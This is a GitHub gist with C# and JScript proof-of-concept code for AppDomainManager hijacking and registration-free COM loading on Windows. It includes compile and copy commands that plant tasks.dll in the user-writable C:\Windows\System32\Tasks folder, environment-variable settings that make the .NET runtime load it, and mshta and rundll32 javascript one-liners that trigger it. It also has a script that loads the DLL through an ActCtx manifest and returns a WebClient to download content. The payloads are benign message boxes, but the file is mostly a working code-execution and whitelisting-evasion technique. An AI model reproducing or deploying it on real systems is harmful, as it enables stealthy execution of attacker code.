-
-
Save byt3bl33d3r/bb0e2444ef1130e5d487799135a4a7da to your computer and use it in GitHub Desktop.
Create a .NET Type Dynamically at Runtime, Execute in Script. Prototype DynamicWrapperX , but not posting that publicly
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.EnterpriseServices; | |
using System.Runtime.InteropServices; | |
using System.Reflection; | |
using System.Reflection.Emit; | |
using System.Collections; | |
using System.Collections.Generic; | |
using System.Net; | |
public sealed class MyAppDomainManager : AppDomainManager | |
{ | |
public override void InitializeNewDomain(AppDomainSetup appDomainInfo) | |
{ | |
System.Windows.Forms.MessageBox.Show("AppDomain - KaBoom!"); | |
// You have more control here than I am demonstrating. For example, you can set ApplicationBase, | |
// Or you can Override the Assembly Resolver, etc... | |
return; | |
} | |
} | |
/* | |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:tasks.dll tasks.cs | |
set APPDOMAIN_MANAGER_ASM=tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null | |
set APPDOMAIN_MANAGER_TYPE=MyAppDomainManager | |
set COMPLUS_Version=v4.0.30319 | |
copy tasks.dll C:\Windows\System32\Tasks\tasks.dll | |
copy tasks.dll C:\Windows\SysWow64\Tasks\tasks.dll | |
Simple One-Liner Triggers. | |
mshta.exe javascript:a=new%20ActiveXObject("System.Object");close(); | |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";a=new%20ActiveXObject("System.Object");close(); | |
*/ | |
namespace MyDLL | |
{ | |
[ComVisible(true)] | |
[Guid("31D2B969-7608-426E-9D8E-A09FC9A5ACDC")] | |
[ClassInterface(ClassInterfaceType.None)] | |
[ProgId("MyDLL.Operations")] | |
public class Operations | |
{ | |
public Operations() | |
{ | |
Console.WriteLine("So It Begins"); | |
} | |
[ComVisible(true)] | |
public string getValue1(string sParameter) | |
{ | |
switch (sParameter) | |
{ | |
case "a": | |
return "A was chosen"; | |
case "b": | |
return "B was chosen"; | |
case "c": | |
return "C was chosen"; | |
default: | |
return "Other"; | |
} | |
} | |
[ComVisible(true)] | |
public string getValue2() | |
{ | |
return "From VBS String Function"; | |
} | |
[ComVisible(true)] | |
public void getValue3() | |
{ | |
System.Windows.Forms.MessageBox.Show("Hey From My Assembly"); | |
} | |
} | |
[ComVisible(true)] | |
[Guid("31D2B969-7608-426E-9D8E-A09FC9A5DCAC")] | |
[ClassInterface(ClassInterfaceType.None)] | |
[ProgId("MyDLL.MyClassBuilder")] | |
public class MyClassBuilder | |
{ | |
public MyClassBuilder() | |
{ | |
Console.WriteLine("So It Begins, My ClassBuilder"); | |
} | |
public object Typer(string inputString) | |
{ | |
//https://stackoverflow.com/questions/11107536/convert-string-to-type-in-c-sharp | |
Type type = Type.GetType(inputString); //target type | |
object o = Activator.CreateInstance(type); // an instance of target type | |
return o; | |
} | |
public void getTypes() | |
{ | |
List<Type> list = new List<Type>(); | |
foreach (Assembly ass in AppDomain.CurrentDomain.GetAssemblies()) | |
{ | |
foreach (Type t in ass.GetExportedTypes()) | |
{ | |
if (t.IsEnum) | |
{ | |
list.Add(t); | |
} | |
} | |
} | |
foreach (Type i in list) | |
{ | |
Console.WriteLine(i.ToString()); | |
} | |
} | |
public System.Net.WebClient getWC() //Just an Example ;-) | |
{ | |
WebClient wc = (System.Net.WebClient)Activator.CreateInstance(typeof(System.Net.WebClient)); | |
return wc; | |
} | |
} | |
} | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// var manifest string should be UTF-16 | |
// Controls the search path for unmanged dlls | |
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319'; | |
//new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Users\\Research\\Documents\\'; | |
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'c:\\Windows\\System32\\Tasks'; | |
new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_ASM') = 'tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null'; | |
new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_TYPE') = 'MyAppDomainManager'; | |
var o = new ActiveXObject("System.Object"); // Trigger AppDomainManager Load | |
// Ideally, we create a DLL, drop it anywhere and load it like DynamicWrapper... | |
// Loads Assembly, but expects it in the C:\Windows\System32 for example for managed code... | |
// Good news, CLR tries to resolve in sub dir with name of app. | |
// Since C:\Windows\system32\tasks is user writable... :) CLR finds and loads our assembly. | |
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"><assemblyIdentity name="tasks" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.Operations" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5ACDC}" progid="MyDLL.Operations" runtimeVersion="v4.0.30319" threadingModel="Both" /><file name="tasks.dll"> </file></assembly>'; | |
var ax = new ActiveXObject("Microsoft.Windows.ActCtx"); //GUID {8fa7728f-b69b-4ee5-99f2-e2aa021bef28} | |
ax.ManifestText = manifest; | |
var dwx = ax.CreateObject("MyDLL.Operations"); | |
dwx.getValue3() //Trigger Message Box | |
var manifest2 = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"><assemblyIdentity name="tasks" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.MyClassBuilder" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5DCAD}" progid="MyDLL.MyClassBuilder" runtimeVersion="v4.0.30319" threadingModel="Both" /><file name="tasks.dll"> </file></assembly>'; | |
var ax2 = new ActiveXObject("Microsoft.Windows.ActCtx"); //GUID {8fa7728f-b69b-4ee5-99f2-e2aa021bef28} | |
ax2.ManifestText = manifest2; | |
var dwx2 = ax2.CreateObject("MyDLL.MyClassBuilder"); | |
//dwx2.getTypes(); | |
var wc = dwx2.getWC(); | |
var s = wc.DownloadString("http://www.example.com"); | |
WScript.StdOut.WriteLine(s); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment